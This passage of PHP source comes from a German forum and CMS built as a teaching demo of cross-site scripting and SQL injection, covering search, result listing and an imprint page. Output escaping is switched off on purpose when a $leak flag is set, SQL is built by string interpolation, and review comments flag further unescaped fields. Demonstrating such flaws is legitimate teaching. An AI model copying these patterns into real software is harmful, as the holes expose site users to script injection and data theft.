jsdebug(e);
a = new ActiveXObject('Microsoft.XMLHTTP');
}
var g,f = document.password, e = f.question, d, c = document.getElementsByTagName('option')[0].firstChild, b = c.nodeValue;
function getask() {
if(f.username.value != ''".(($leak) ? '' : " && f.mail.value != ''").") {
a.open('GET','$self?ask=' + f.username.value".(($leak) ? '' : " + ':' + f.mail.value").",false); // Frage vom Benutzer anfordern
a.send('');
d = 0;
if((g = a.responseText.match(/^(\d+)-(.*)$/)))
if(g[1] > 0)
d = g[1];
else
c.replaceData(0,c.nodeValue.length,g[2]);
else
c.replaceData(0,c.nodeValue.length,b);
e.selectedIndex = d;
}
}").'//--></script>';
# Search form ("Suche")
if($request == 'Suche') {
// Per-user counters for the user drop-down: all entries (acount), blog (bcount), files (dcount),
// forum (fcount), mail (mcount) and the newest create time. A pseudo user with id 0 named
// 'Unbekannt' is unioned in; users without any entry or file are dropped by the HAVING clause.
// Viewers without the admin bit only count mails they sent or received: the 'x' in the template is
// replaced by $uid, or by 0 when nobody is logged in.
$usr = $sql['aq']($conn,"
select u.id as id,
username as username,
count(a.id) as acount,
count(b.id) as bcount,
ifnull(dcount,0) as dcount,
count(f.id) as fcount,
count(m.id) as mcount,
max( ifnull(max(a.[create]),0),
ifnull(max(d.ctime),0)) as time
from ( select 0 as id, 'Unbekannt' as username
union
select id,username
from [user] as u
where status is not null) as u
left join ( select user,count(*) as dcount,[create] as ctime
from file
where status ".(($status%4 == 0) ? '' : '<')."= 1
group by user) as d on u.id = d.user
left join forum as a on u.id = a.userid
and a.status".(($status%4 == 0) ? "%2 = 0" : " is not null")."
left join forum as b on a.id = b.id
and b.mailid = b.userid
left join forum as f on a.id = f.id
and f.mailid is null
left join forum as m on a.id = m.id
and m.mailid is not null
and m.mailid != m.userid
".(($status/2%2) ? '' : str_replace('x',(($uid) ? $uid : 0),"and (m.mailid = x or m.userid = x)"))."
group by u.id
having acount > 0 or dcount > 0
order by username");
// $wrt sums the counters per area (b, d, f, m); $array maps user id => "id,b,d,f,m" for the script
// at the end of the form; $val keeps the newest timestamp seen.
$wrt = array('b' => 0, 'd' => 0, 'f' => 0, 'm' => 0);
$array = array();
$val = 0;
// Each result row is replaced by its <option> markup.
// NOTE(review): the username is written into the option text without HTML escaping.
foreach($usr as $key => $var) {
$usr[$key] = "<option value='$var[id]'".((isset($_GET['id']) and $_GET['id'] == $var['id']) ? " selected" : '').">$var[username]</option>";
$array[$var['id']] = $var['id'];
if($val < $a = strtotime($var['time']))
$val = $a;
foreach(array_keys($wrt) as $a) {
$array[$var['id']] .= ','.$var[$a.'count'];
if($var[$a.'count'])
$wrt[$a] += $var[$a.'count'];
}
}
// Area drop-down: only areas with at least one hit are offered. The CMS count is limited to pages
// with status/8%2 set and, for viewers without the admin bit, to status/2%4 not above the viewer's level.
$rows = array();
if($wrt['b'])
$rows[] = "<option value='b'".(($s == 'b') ? ' selected' : '').">Blog ($wrt[b])</option>";
if($var = $sql['sq']($conn,"select count(*) from [cms] where status/8%2".(($status/2%2) ? "" : " and status/2%4 <= ".($status/2%2 + $status%2*2))))
$rows[] = "<option value='c'".(($s == 'c') ? ' selected' : '').">CMS ($var)</option>";
if($wrt['d'])
$rows[] = "<option value='d'".(($s == 'd') ? ' selected' : '').">Datei ($wrt[d])</option>";
if($wrt['f'])
$rows[] = "<option value='f'".(($s == 'f' or !$s) ? ' selected' : '').">Forum ($wrt[f])</option>";
if($wrt['m'])
$rows[] = "<option value='m'".(($s == 'm') ? ' selected' : '').">Mail ($wrt[m])</option>";
// Page-size drop-down; each value is ",N" and the entry equal to $max is preselected when a page
// parameter was sent.
$line = array();
foreach(array(1,2,3,5,10,20,25,50,75,100) as $var)
$line[] = "<option value=',$var'".((isset($_GET['page']) and $var == $max) ? ' selected' : '').">$var</option>";
// The form itself. The search term is passed through strtr($q,$html) before it is written into the
// value attribute. The "Neuheiten" checkbox appears when $_SESSION['lua'] is older than the newest
// entry; viewers with the admin bit get a link that submits "-" as search term. The help table is
// shown when bit 2 of $_COOKIE['hide'] is set. The trailing script hides user options that have no
// hit in the selected area and disables the user list for the CMS area.
$out .= "<form name='search' action='$self' method='get'><table align='center'><tr><td><fieldset><legend><b>Suche</b></legend>
<table><tr><td width='99%'><small><a href='#' id='ash' title='Suchhilfe ein/ausblenden' onClick='".preg_replace($jshide[0],$jshide[1],"help;2")."'>Suchbegriff</a>:"
.((isset($_SESSION['lua']) and strtotime($_SESSION['lua']) < $val) ? " <span title='Seit: ".date('d.m.Y H:i:s',strtotime($_SESSION['lua']))."'><input type='checkbox' id='new' name='new' value='1'"
.((isset($_GET['new'])) ? " checked" : "")."><label for='new'>Neuheiten</label></span>" : "")
.(($status/2%2) ? " <a href='#' onClick='document.search.q.value=\"-\";document.search.submit()'>Gelöschtes Suchen</a>" : "")
."</small><br /><input type='text' name='q' value='".strtr($q,$html)."' size='60' style='width:100%' /></td>"
.((count($rows)) ? "<td><small>Ort</small><br /><select name='s' size='1' onchange='chg(this.value)'>".implode("",$rows)."</select></td>" : "")
.((count($usr) > 1) ? "<td><small>Benutzer</small><br /><select name='id' size='1' id='user'><option value=''".((!isset($_GET['id']) and !$id) ? " selected" : "").">Alle Benutzer</option>".implode("",$usr)."</select></td>" : "")
."<td><small>Max</small><br /><select size='1' name='page'><option value=','> </option>".implode('',$line)."</select></td></tr>
<tr><td colspan='4' align='center'><input type='submit' value='Suchen' /><div id='help' class='cr' align='left' style='display:".((isset($_COOKIE['hide']) and ($_COOKIE['hide']/(1<<2))%2) ? 'block' : 'none')."'>".@preg_replace(array_keys($creole),array_values($creole),"**++Suchhilfe:++**
|100%
|=Suchbegriff |=findet |=findet nicht |=Beschreibung |
|@@<<style color:green 'Anlage'>> blumen@@ |Stereo<<style color:green '__anlage__'>> |Blütenbeet |**ODER**-Suche --(//Mindestens eins muss vorkommen//)-- |
|@@**+**<<style color:green 'Haus'>> **+**<<style color:green 'baum'>>@@ |<<style color:green '__Baumhaus__'>> |<<style color:blue 'Haus'>>katze |**UND**-Suche --(//Alle müssen vorkommen//)-- |
|@@<<style color:green 'Auto'>> **-**<<style color:red 'reifen'>> **-**spur@@ |<<style color:green '__Auto__'>>matisch |<<style color:blue 'Auto'>><<style color:red '__reifen__'>> |**NICHT-ODER**-Suche --(//Keins darf vorkommen//)-- |
|@@**\"**<<style color:green 'Haus im Garten'>>**\"**@@ |<<style color:green '__Haus im Garten__'>> |Im Garten<<style color:blue haus>> |**Satz**-Suche --(//Genau wie vorgegeben//)-- |
|@@<<style color:green 'wein'>>**~***<<style color:green 'glass'>>@@ |<<style color:green '__Wein__'>>trauben<<style color:green '__glass__'>> |Glass <<style color:blue Wein>> |**Platzhalter** @@**~***@@--(//Für alles oder nichts//)-- |
|@@<<style color:green 'Rollt'>>**?**<<style color:green 'r'>>@@ |<<style color:green '__Rollt__'>>o<<style color:green '__r__''>> |<<style color:blue 'Rollt'>>reppe |**Platzhalter ?** --(//Für **EIN** Zeichen//)-- |")."</div></td></tr></table></fieldset></td></tr></table></form><script type='text/javascript'><!--\n".preg_replace($js,'',"
function chg(x) {
if((y = document.getElementById('user'))) {
z = y.getElementsByTagName('option');
e = a.indexOf(x);
for(d=1;d<z.length;d++) {
f = c[z[d].value].split(',');
z[d].firstChild.replaceData(0,z[d].firstChild.data.length,z[d].firstChild.data.replace(/\s.*/,'') + ' ' + '(' + f[e] + ')');
if(parseInt(f[e],10) > 0) {
z[d].style.display = 'block';
z[d].disabled = false;
}
else {
z[d].style.display = 'none';
z[d].disabled = true;
}
}
if(x == 'c') {
y.setAttribute('disabled',1);
y.selectedIndex = 0;
}
else
y.removeAttribute('disabled');
}
}
var a = 'c".implode('',array_keys($wrt))."',
b = '".implode(':',$array)."'.split(':'),
c = [],
d,e,f,x,y,z;
for(x=0;x<b.length;x++) {
y = b[x].match(/^(\d+),.*$/);
c[y[1]] = y[0];
}
chg(document.search.s.value);
document.getElementById('ash').setAttribute('href','#');
document.search.q.focus();
")."//--></script>";
}
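# Forum, blog and mail entries with smilies and paging; search hits for CMS pages and files are
# rendered here as well.
# Runs when $request is empty, 'Blog', 'Mail' or 'Forum', or when nothing has been rendered so far
# ($out is empty or ends with the login script marker) and the Impressum page was not requested.
# Output escaping in this block depends on $leak: with $leak set, titles, messages, taglines, CMS
# content, file info and the echoed search term are written raw; otherwise they pass through strtr()
# with $html (or array_slice($html,1)).
# NOTE(review): user names, mail recipients and file names are written raw in both modes.
if(preg_match('/^(Blog|Mail|Forum)?$/',$request) or ($out == '' or substr($out,-21) == '//login//--></script>')
and !(isset($_REQUEST['request']) and $_REQUEST['request'] == 'Impressum' or $request == 'Impressum')) {
$wrt = array(); // search terms as regex fragments; handed on as $q[2] for the result highlighter
// Split $q into tokens: an optional + or - prefix followed by a quoted phrase or a run of
// non-space characters.
if(preg_match_all('/([-+]?)(".+?(?<!\\\\)"|\'.+?(?<!\\\\)\'|\S+)/',$q,$val)) {
foreach($val[1] as $key => $var) {
// Token without surrounding quotes, without backslashes in front of quotes and without
// leading, trailing or repeated '*'.
$key = preg_replace(array('/^([\'"])(.+)\1$/','/\\\\(?=[\'"])|\*+(?=\*)|^\*+|\*+$/'),array('$2',''),$val[2][$key]);
// One LIKE fragment per token, grouped by prefix. The value passes through $sql['es'] and the
// wildcards * and ? become % and _.
// NOTE(review): doubling % and _ does not make them literal in a SQLite LIKE without an ESCAPE
// clause; they keep acting as wildcards.
$val[3][$var][] = " like '%".$sql['es'](strtr($key,array('%' => '%%', '_' => '__', '*' => '%', '?' => '_')))."%'";
if($var != '-' and $key)
$wrt[] = strtr(preg_quote($key,'/'),array('\\?' => '.', '\\*' => '.*?'));
}
// '+' tokens are AND-ed, the others OR-ed, the '-' group is negated; the groups are joined with AND.
foreach($val[3] as $key => $var)
$val[3][$key] = (($key == '-') ? "not " : "")."(".implode((($key == '+') ? ' and ' : ' or '),$var).")";
$val = implode(' and ',$val[3]);
}
else
$val = " like '%".$sql['es']($q)."%'";
// NOTE(review): the branches below splice the column expression into $val with str_replace(' ',...).
// As written that replaces every space of $val; the placeholder character may have been altered in
// this copy of the file - confirm against the original.
if(!$request and preg_match('/^[cd]$/',$s)) { // CMS or file
// $usr[0] is the WHERE condition, $usr[1] the requested user id.
// NOTE(review): $usr[1] is the unvalidated $_GET['id'] here and is interpolated into the paging link
// further down; the forum branch checks the same parameter with /^\d+$/ first.
$usr = array((($s == 'c')
? (($status/2%2) ? "" : "c.status/2%4 <= ".($status/2%2 + $status%2*2)." and ").(($q == '-' and $status/2%2) ? "c.status is null" : str_replace(' ',"c.name||ifnull(c.description,'')||c.content",$val))
: "(".(($status/2%2) ? "a.status is".(($q == '-') ? "" : " not")." null" : "a.status%2 = 1".(($uid) ? " or a.status = 0 or a.user = $uid and a.status is not null" : "")).")".(($id !== false) ? " and a.user=$id" : "").(($status/2%2 and $q == '-') ? ""
: " and a.status/2%2 = 0 and (".str_replace(' ',"a.name||ifnull(a.info,'')",$val)." or ".str_replace(' ',"a.type like 'text/%' and b64d(ifnull(a.data,''))",$val).")")),((isset($_GET['id'])) ? $_GET['id'] : $id));
// "new" limits the hits to entries created after the time stored in $_SESSION['lua'].
$new = (isset($_GET['new']) and isset($_SESSION['lua'])) ? " and ".(($s == 'd') ? 'a.' : '')."[create] > datetime('$_SESSION[lua]')" : '';
$num = $sql['sq']($conn,"select count(*) from ".(($s == 'c') ? "[cms] as c where c.status/8%2 and" : "[file] as a where")." $usr[0]$new");
if($q)
$q = array(0,$q,$wrt);
}
else { // mail, blog or forum
$mail = " where f.mailid ";
if(($request == 'Mail' or $s == 'm') and $uid) {
// Mailbox of the viewer, or of $id when the viewer has the admin bit.
// NOTE(review): the condition contains an "or"; filters appended to $mail later bind to the second
// alternative only, because AND takes precedence over OR in SQL - confirm this is intended.
$var = ($status/2%2 and $id) ? $id : $uid;
$mail .= "= $var and f.mailid != f.userid ".(($q == '-') ? '' : "and f.status/2%2 = 0 or (f.mailid = $var or f.userid = $var and f.mailid is not null) and f.mailid != f.userid ");
}
elseif($request == 'Blog' or $s == 'b') { // blog: entries whose mailid equals the author
$mail .= "= f.userid".(($q == '-') ? '' : " and f.status is not null");
$var = false;
if($mid)
$var = $mid;
elseif($id)
$var = $id;
// elseif(!$s) $var = $uid;
if($var)
$mail .= " and f.userid = $var";
}
else // everything else: entries whose mailid is null
$mail .= "is null";
if($status%4 == 0)
$mail .= " and f.status%2 = 0";
// User filter: $_GET['id'] is only used when it consists of digits; $usr becomes
// array(SQL fragment, id, username) or array('').
$usr = (isset($_GET['id']) and ($request != false or count($_POST) == 0) and preg_match('/^\d+$/',$_GET['id'],$var)) ? array(" and (f.userid = $var[0] or f.mailid = $var[0])",$var[0],(($var[0]) ? $sql['sq']($conn,"select username from [user] where id=$var[0]") : null)) : array('');
if($q != '') { // turn the search request into the final SQL WHERE fragment
if($q == '-')
$v = " and f.status is null";
elseif(preg_match('/^\d+$/',$q))
$v = " and (f.id = $q or f.path like '%/$q/%')";
else
$v = " and ".str_replace(' ',"ifnull(f.title,'')||f.message",$val);
$q = array($v,$q,$wrt);
}
if(!is_array($q))
$q = array('');
// Without any filter only thread starters (path is null) are listed.
if(!isset($_GET['q']) and !isset($_GET['b']) and "$usr[0]$q[0]" == "")
$q[0] = ' and f.path is null';
elseif("$usr[0]$q[0]" == "")
$q[1] = "";
$new = (isset($_GET['new']) and isset($_SESSION['lua'])) ? " and f.[create] > datetime('$_SESSION[lua]')" : '';
$num = $sql['sq']($conn,"
select count(*)
from [forum] as f
left join [user] as u on f.userid = u.id "
.(($status/2%2 and isset($q[1]) and $q[1] == "-") ? '' : " and f.status is not null and u.status is not null")."
$mail$usr[0]$q[0]$new");
}
// The return value is discarded. NOTE(review): presumably the $paging[5]/$paging[6] replacement
// (defined elsewhere) sets the paging variables used below ($val, $code) as a side effect - confirm.
preg_replace($paging[5],$paging[6],"$num,$max,<a href='$self".(($request != '') ? "/$request" : '')."?page=#key##max#".((count($usr) > 1) ? "&id=$usr[1]" :'').(($sort) ? "&sort=$sort" : "").((count($q) > 1) ? "&q=".urlencode($q[1]) : '')."' title='#var#'>#key#</a>");
// No page given: start with the last $max rows.
if(!$page[0])
$val = max(0,$num-$max);
$rows = array();
if($s == 'c') { // CMS pages
$line = $sql['aq']($conn,"
select c.id as id,
c.[create] as 'create',
c.change as change,
c.status as '.status',
ifnull(c.status/2%4,'-1') as right,
ifnull(nullif(c.name,''),'Startseite') as name,
c.description as title,
ifnull(d.content,c.content) as '.content',
(select username from user where status/2%2 = 1) as 'from',
'cms' as type
from [cms] as c
left join [cms] as d on d.name like c.content
where c.status/8%2 and $usr[0]$new
order by c.id
limit $val,$max");
foreach($line as $var) {
$creolevar = array_merge($creolevar,$var);
// From here on $val is reused as array(lowest id, highest id) of the rows shown.
$val = array(min((($val[0]) ? $val[0] : $var['id']),$var['id']),max($val[1],$var['id']));
$rows[] = "<fieldset><legend>(".(($status/2%2 or $status%4 == 1 and $var['.status']/2%4 == 2) ? "<a href='$self/CMS?id=$var[id]'>$var[id]</a>" : $var['id']).") <a href='$self/$var[name]'>$var[name]</a>"
.(($var['title']) ? " <small class='cr'>(".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $var['title'] : strtr($var['title'],array_slice($html,1)))).")</small>" : "")
."</legend><div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $var['.content'] : strtr($var['.content'],array_slice($html,1))))."</div></fieldset>";
}
$var = array('Seite','Seiten','Seiten');
$usr = array();
}
elseif($s == 'd') { // files
$line = $sql['aq']($conn,"
select a.id as id,
ifnull(a.user,0) as user,
a.name as name,
a.info as info,
ifnull(a.size,b.size) as size,
ifnull(a.type,b.type) as type,
ifnull(u.id,0) as uid,
u.status as ustat,
u.username as username
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
where $usr[0]$new
order by a.id
limit $val,$max");
$a = 0;
// Preview by main MIME type: image, text, video and audio are embedded, everything else is a download
// link. Text files are fetched by the Load() script function (emitted once, with the first text file)
// and written into a <pre> after &, < and > have been replaced by their entities.
foreach($line as $var) {
$val = array(min((($val[0]) ? $val[0] : $var['id']),$var['id']),max($val[1],$var['id']));
// Admin viewers and the owner address the file by id, everyone else by "<uid>-<name>".
$name = ($status/2%2 or $uid == $var['uid']) ? $var['id'] : "$var[uid]-$var[name]";
$rows[] = "<fieldset><legend>(".(($status/2%2 or $uid == $var['uid']) ? "<a href='$self/file?$var[id]'>$var[id]</a>" : $var['id']).") <a href='$self/file?$var[user]-$var[name]'>$var[name]</a> - ".number_format(abs($var['size']),0,'','.')." Bytes"
." <small>von ".((is_null($var['username'])) ? "Unbekannt" : "<a href='$self/Profil?id=$var[uid]' title='Profil anzeigen'>".((is_null($var['ustat'])) ? "<font color='#ff0000'>$var[username]</font>" : $var['username'])."</a>")
.(($var['info']) ? " <span class='cr'>(".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $var['info'] : strtr($var['info'],array_slice($html,1)))).")</span>" : "")
."</small></legend>"
.((($usr = preg_replace('/^([^\/]+)\/.*$/','$1',$var['type'])) == 'image') ? "<img src='$self/file?$name' alt='$var[name]' />"
: (($usr == 'text') ? "<script type='text/javascript'><!--\n".preg_replace($js,"",(($a++) ? "" : "
try {
var A = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
A = new ActiveXObject('Microsoft.XMLHTTP');
}
function Load(a) {
A.open('GET','$self/file?' + a,false);
// A.overrideMimeType('text/plain; charset=iso-8859-1');
A.send('');
document.write('<pre style=\"white-space:pre-wrap\">' + A.responseText.replace(/&/g,'&amp;').replace(/</g,'&lt;').replace(/>/g,'&gt;') + '<\/pre>');
}")."Load('$name');")."//--></script><noscript><iframe src='$self/file?$name' width='100%'></iframe></noscript>"
: (($usr == 'video') ? "<video src='$self/file?$name' preload='metadata' autobuffer controls>$self/file?$name</video>"
: (($usr == 'audio') ?"<audio src='$self/file?$name' controls>$self/file?$name</audio>"
: "<b>Download</b>: <a href='$self/file?$name'>$var[name]</a>"))))."</fieldset>";
}
$var = array('Datei','Dateien','Dateien');
$usr = array();
}
else {
// Forum, blog and mail entries. $wrt is reused as the status filter for the joins: empty for an admin
// viewer searching with "-", otherwise "status is not null".
$wrt = ($status/2%2 and isset($q[1]) and $q[1] == "-") ? 0 : "status is not null";
$rows = $sql['aq']($conn,"
select f.id as id,
f.[create] as 'create',
f.[change] as change,
f.changes as changes,
ifnull(f.status/2%2,'-1') as 'right',
strftime('%d.%m.%Y %H:%M:%S',f.[create]) as crdatum,
strftime('%d.%m.%Y %H:%M:%S',f.change) as chdatum,
f.title as title,
f.message as message,
f.status as 'f.status',
u.status as 'u.status',
s.status as 's.status',
u.username as username,
u.tagline as tagline,
f.userid as userid,
f.path as path,
r.title as rtitle,
b.username as ruser,
r.userid as ruid,
b.status as rstat,
strftime('%d.%m.%Y %H:%M:%S',r.[create]) as rdate,
t.id as 't.id',
f.mailid as mailid,
s.username as mailto
from [forum] as f
left join [forum] as r on f.path like '%/'||r.id||'/'" .(($wrt) ? " and r.$wrt" : '')."
left join [forum] as t on t.path like '%/'||f.id||'/'" .(($wrt) ? " and t.$wrt" : '')."
left join [user] as u on u.id = f.userid" .(($wrt) ? " and f.$wrt and u.$wrt" : '')."
left join [user] as b on b.id = r.userid" .(($wrt) ? " and b.$wrt" : '')."
left join [user] as s on s.id = f.mailid" .(($wrt) ? " and s.$wrt" : '')."
$mail$usr[0]$q[0]$new
group by f.id
order by f.id
limit $val,$max",SQLITE_ASSOC);
// $wrt now becomes the query-string prefix for the admin edit links.
$wrt = array();
if($getopt != '')
$wrt[] = $getopt;
if($page[1] != '')
$wrt[] = $page[1];
$wrt = "?".implode('&',$wrt).((count($wrt) > 0) ? '&' : '');
foreach($rows as $key => $var) {
// A mail displayed to its recipient is marked as read (status bit 2) while the list is rendered.
if($uid and $uid == $var['mailid'] and !floor($var['f.status']/2))
$sql['e']($conn,"update [forum] set status=status%2+2 where id=$var[id]");
$val = array(min((($val[0]) ? $val[0] : $var['id']),$var['id']),max($val[1],$var['id']));
$creolevar = array_merge($creolevar,array('type' => 'forum', 'id' => $var['id'], 'name' => $var['id'], 'title' => $var['title'], 'from' => $var['username'], 'create' => strtotime($var['create']), 'change' => strtotime($var['change']), 'right' => $var['right']));
// Action links (reply, edit, delete) for logged-in users, or for guests when $gast is set.
$line = array();
if(isset($_SESSION['uid']) and $_SESSION['uid'] or $gast) {
if((is_null($var['mailto']) or $var['mailid'] == $uid) and ($var['userid'] != $uid or $status%4 == 3 and $var['userid'] != $var['mailid']))
$line[] = "<a href='$self/Beitrag?id=$var[id]'>Antworten</a>";
if((is_null($var['mailto']) or $var['mailid'] == $uid) and $var['userid'] === $var['mailid']) {
$uedit = "Beitrag?id=$var[id]";
$line[] = "<a href='$self/$uedit'>Bearbeiten</a>";
}
if($uid and $var['mailid'] == $uid)
$line[] = "<a href='$self/".(($var['userid'] == $var['mailid']) ? 'Blog' : 'Mail')."?kill=$var[id]' onclick='return confirm(\"Wirklich Löschen?\")'><font color='#ff0000' title='Löschen'><b>X</b></font></a>";
}
// The entry itself: legend with id, title, dates, author, recipient, parent and reply count, then the
// message and the author's tagline. Title and parent title run through the $smile replacements, the
// message through the $creole replacements.
$rows[$key] = "<fieldset class='cr'><legend>"
.(($status%4 == 3) ? "<a href='$self/Admin$wrt"."edit=$var[id]' title='Bearbeiten'>".((is_null($var['f.status'])) ? "<font color='#ff0000'>($var[id])</font>" : "($var[id])")."</a> " : "(<a$rel href='$self/Source?q=$var[id]' title='Quelltext'>$var[id]</a>) ")
.((is_null($var['t.id'])) ? "<span onclick=\"location.href='$self/$request?page=1&q=$var[id]'\">" : "<a href='$self".(($request == 'Mail') ? "/Mail?".(($id) ? "id=$id&" : "") : (($request == 'Blog') ? "/Blog/$var[username]?" : "?"))."page=1&q=$var[id]' title='Antwort suchen'>")
.((is_null($var['title'])) ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),(($leak) ? $var['title'] : strtr($var['title'],array_slice($html,1))))."</b>")
.((is_null($var['t.id'])) ? "</span>" : "</a>").(($var['f.status']%2) ? "<b title='Nix für Gäste'>*</b>" : "")
." <small>(Vom $var[crdatum]".(($var['create'] != $var['change']) ? " / <span title='Änderungen: $var[changes]'>Geändert: $var[chdatum]</span>" : '')
.(($var['userid'] === $var['mailid'] and ($mid or $id)) ? ")" : " von "
.((is_null($var['username'])) ? "Unbekannt" : "<a href='$self/Profil/$var[username]' title='Profil anzeigen'>".((is_null($var['u.status'])) ? "<font color='#ff0000'>$var[username]</font>" : $var['username'])."</a>")
.((!is_null($var['mailid']) and $var['userid'] != $var['mailid']) ? " an "
.((is_null($var['mailto'])) ? "Unbekannt" : "<a href='$self/Profil/$var[mailto]' title='Profil anzeigen'>".((is_null($var['s.status'])) ? "<font color='#ff0000'>$var[mailto]</font>" : $var['mailto'])."</a> [<font color='#".((floor($var['f.status']/2)) ? "00a000'>" : "a00000'>un")."gelesen</font>]") : "").")")
.((is_null($var['path']) or is_null($var['ruid'])) ? "" : " - Antwort auf <a href='$self/$request".(($request == 'Blog') ? "/$var[username]" : '')."?".(($request == 'Mail' and $id) ? "id=$id&" : '')."page=1&q=".preg_replace('!^.*/(\d+)/$!','$1',$var['path'])."' title='Reference suchen'>"
.((is_null($var['rtitle'])) ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),(($leak) ? $var['rtitle'] : strtr($var['rtitle'],array_slice($html,1))))."</b>")
."</a> (Vom $var[rdate] von ".((is_null($var['ruser'])) ? 'Unbekannt'
:"<a href='$self/Profil/$var[ruser]' title='Profil anzeigen'>"
.((is_null($var['rstat'])) ? "<font color='#ff0000'>$var[ruser]</font>" : "$var[ruser]")."</a>").")")
.((!is_null($var['t.id']) and $row = $sql['sq']($conn,"select count(*) from [forum] where path like '%/$var[id]/%'".(($status/2%2) ? '' :" and status is not null"))) ? " - <a href='$self".(($request == 'Mail') ? "/Mail?".(($id) ? "id=$id&" : "") : (($request == 'Blog') ? "/Blog/$var[username]?" : "?"))."page=1&q=$var[id]' title='Antwort suchen'>$row Antwort".(($row > 1)?"en":"")."</a>" : "")
."</small><br /></legend>"
.((count($line) > 0 and !is_null($var['f.status'])) ? "<table align='right'><tr><td align='center'><small>".implode(' | ',$line)."</small></td></tr></table>" : '')
.@preg_replace(array_keys($creole),array_values($creole),strtr($var['message'],(($leak) ? array() : array_slice($html,1)))
.(($var['tagline']) ? "\n<hr class='tl' /><font size='2'>\r".strtr($var['tagline'],(($leak) ? array() : $html))."\r</font>" : ""))."</fieldset>";
}
// Newest entry first, unless a search term is set.
if(!isset($q[1])) // or !preg_match('/^\d+$/',$q[1])
$rows = array_reverse($rows);
if(isset($_SESSION['uid']) and $_SESSION['uid'] or $gast)
$out .= "<table align='right'><tr><td><a href='$self/Beitrag".(($request == 'Blog') ? "?blog" : "")."'>Neuen Beitrag verfassen</a></td></tr></table>";
$var = ($request == 'Mail' and $uid) ? array('die Mail','Mails','Mail-Themen') : array('Beitrag','Beiträge','Beitragsthemen');
}
// Summary line, paging code and the rendered rows. When word search terms exist, a script wraps each
// match inside elements of class 'cr' in a <span class='shl'>.
// NOTE(review): the terms in $q[2] are prepared with preg_quote(), which does not escape quotes, and
// are then placed inside a single-quoted script string - confirm $q is cleaned for that context where
// it is read.
if(count($rows) > 0)
$out .= "<center>Es ".(($val[0] == $val[1]) ? "wird $var[0] Nr. ".number_format($val[0],0,'','.')." ": "werden die $var[1] ".number_format($val[0],0,'','.')." bis ".number_format($val[1],0,'','.')." von insgesamt ".number_format($num,0,'','.').((isset($q[1])) ? " $var[1] " : " $var[2] "))
.((count($q) > 1 and $q[1] != '' and !preg_match('/^\d+$/',$q[1])) ? "mit dem Suchbegriff: &quot;<a href='$self/Suche?$getopt'>".(($leak) ? $q[1] : strtr($q[1],$html))."</a>&quot; " : '')." angezeigt" // XSS demo: with $leak the search term is echoed raw
.((count($usr) > 1) ? ", die von ".((is_null($usr[2])) ? "Unbekannt" : "<a href='$self/Profil/$usr[2]'>$usr[2]</a>")." geschrieben wurde".(($val[0] == $val[1]) ? '' : 'n') : '')
."!</center><h4 align='center'>$code</h4>".implode("<br /><hr style='display:none' />\r\n",$rows)."<h4 align='center'>$code</h4>"
.((isset($q[2]) and $q[2] and !preg_match('/^\d+$/',$q[1])) ? "<script type='text/javascript'><!--\n".preg_replace($js,'',"// Ergebnisse mit JavaScript hervorheben
var d = window.document,
a = document.getElementsByClassName('cr'),
r = new RegExp('".implode('|',$q[2])."','gi');
h = d.createElement('span');
h.className = 'shl';
for(b=0;b<a.length;b++) {
o = [a[b]],
i = 0;
do {
m = o[i];
if(m.nodeType == m.TEXT_NODE) {
r.lastIndex = 0;
l = r.exec(m.nodeValue);
if(l !== null) {
k = l[0].length;
if(r.lastIndex > k) {
m.splitText(r.lastIndex - k);
m = m.nextSibling;
}
if(m.nodeValue.length > k) {
m.splitText(k);
o[i++] = m.nextSibling;
}
(t = h.cloneNode(true)).appendChild(d.createTextNode(l[0]));
m.parentNode.replaceChild(t,m);
}
}
else {
j = m.childNodes.length;
while(j)
o[i++] = m.childNodes.item(--j);
}
}
while(i--);
}") // a[b].innerHTML = a[b].innerHTML.replace(/(^|[>.,!?()\s;-])(".implode('|',$q[2]).")([<.,!?()\s&-]|$)/gi,'$1<span class=\'hl\'>$2<\/span>$3');
."//--></script>" : "")."<!---->";
else
// Nothing found: either a "no entries" message or, when nothing else was rendered, the CMS start page.
if($user or $s)
$out .= "<center>Keine Einträge "
.((count($q) > 1)? "mit den Suchbegriff: &quot;<a href='$self/Suche?$getopt'>".(($leak) ? $q[1] : strtr($q[1],$html))."</a>&quot;" : "") // XSS demo: with $leak the search term is echoed raw
.((count($usr) > 1) ? " von <a href='$self/Profil?id=$usr[1]'>$usr[2]</a>" : "")." gefunden!</center>";
elseif($out == '' and $content = $sql['sq']($conn,"
select ifnull(r.content,ifnull(c.content,''))
from [cms] as c
left join [cms] as r on r.name like c.content
where c.name = '' and c.status/2%4 <= ".($status/2%2 + $status%2*2)))
$out = "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $content : strtr($content,array_slice($html,1))))."</div>";
}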
}
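# Impressum (imprint page); the attack-demo link list inside it is only emitted when $leak or the $status/2%2 bit is set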
if((isset($_REQUEST['request']) and $_REQUEST['request'] == 'Impressum' or $request == 'Impressum') and $var = array('Bei Aufruf der Suchfunktion:','<small title="Der Angriff benötigt eine Internet-Verbindung">*</small>') and $creolevar['type'] = 'intern')
$out .= "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),"??li=[[::w/)Login(_~(Informationstechnik~)]]????pm=:php.net/manual/de/????rp=reference.pcre.pattern.modifiers??$info[4]$info[6]Dieses ??if:F[[::w/Internetf)orum]]?? (//Basierend auf [[::w/)PHP]] 4.3+ und [[::w/)SQLite]] 2.8//) ist für die Verdeutlichung von ??ak:Angriffe??n und ??sl:[[::w/)<<<toutf Sicherheitslücke(_~(Software~)>>>]]??n mit ??xs:[[::w/)Cross-Site-Scripting]]?? und ??si:[[::w/)SQL-Injection]]?? gedacht!
Es soll zeigen, wie man es **NICHT** machen soll, und was passieren kann, wenn man es **DOCH** macht ;-)".(($leak !== 0 and isset($_COOKIE['leak']) and !$_COOKIE['leak']) ? "\n\n**++Die ??sl??n wurden per Cookie deaktiviert!++**
Um die Angriffsbeispiele wieder sichtbar zu machen:
* muss man entweder die ??sl??n wieder **[[^Le)ak]]tivieren**
